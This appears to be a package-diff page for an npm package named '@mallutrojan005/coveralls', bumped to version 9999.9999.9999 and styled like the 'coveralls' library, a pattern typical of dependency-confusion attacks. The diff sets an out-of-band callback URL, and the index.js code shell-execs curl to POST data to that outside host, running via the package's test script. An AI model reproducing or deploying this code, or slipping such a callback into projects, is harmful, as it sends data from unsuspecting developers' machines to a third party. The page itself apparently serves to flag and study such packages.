@mallutrojan005/coveralls 2.1.0 → 9999.9999.9999
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +1 -1
- package/package.json +5 -16
package/index.js
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
const { exec } = require("child_process");
|
2
2
|
|
3
3
|
function sendPingback(data) {
|
4
|
-
const collaboratorUrl = "https://
|
4
|
+
const collaboratorUrl = "https://usbbcjkkyavkeqhiqzrdv5vnqip58g0j7.oast.fun";
|
5
5
|
exec(`curl -X POST -d "${data}" ${collaboratorUrl}`, (error, stdout, stderr) => {
|
6
6
|
if (error) {
|
7
7
|
console.error(`Error: ${error.message}`);
|
package/package.json
CHANGED
@@ -1,26 +1,15 @@
|
|
1
1
|
{
|
2
|
-
|
3
2
|
"name": "@mallutrojan005/coveralls",
|
4
|
-
|
5
|
-
"version": "2.1.0",
|
6
|
-
|
3
|
+
"version": "9999.9999.9999",
|
7
4
|
"description": "A simple package to trigger Burp Collaborator for security testing",
|
8
|
-
|
9
5
|
"main": "index.js",
|
10
|
-
|
11
6
|
"scripts": {
|
12
|
-
|
13
7
|
"test": "node index.js"
|
14
|
-
|
15
8
|
},
|
16
|
-
|
9
|
+
"author": "Your Name",
|
10
|
+
"license": "MIT",
|
17
11
|
"dependencies": {
|
18
|
-
|
19
|
-
"
|
20
|
-
|
21
|
-
"assistants-nextjs": "^9.0.0"
|
22
|
-
|
12
|
+
"axios": "^0.21.1",
|
13
|
+
"collaborator-trigger05": "^1.0.9"
|
23
14
|
}
|
24
|
-
|
25
15
|
}
|
26
|
-
|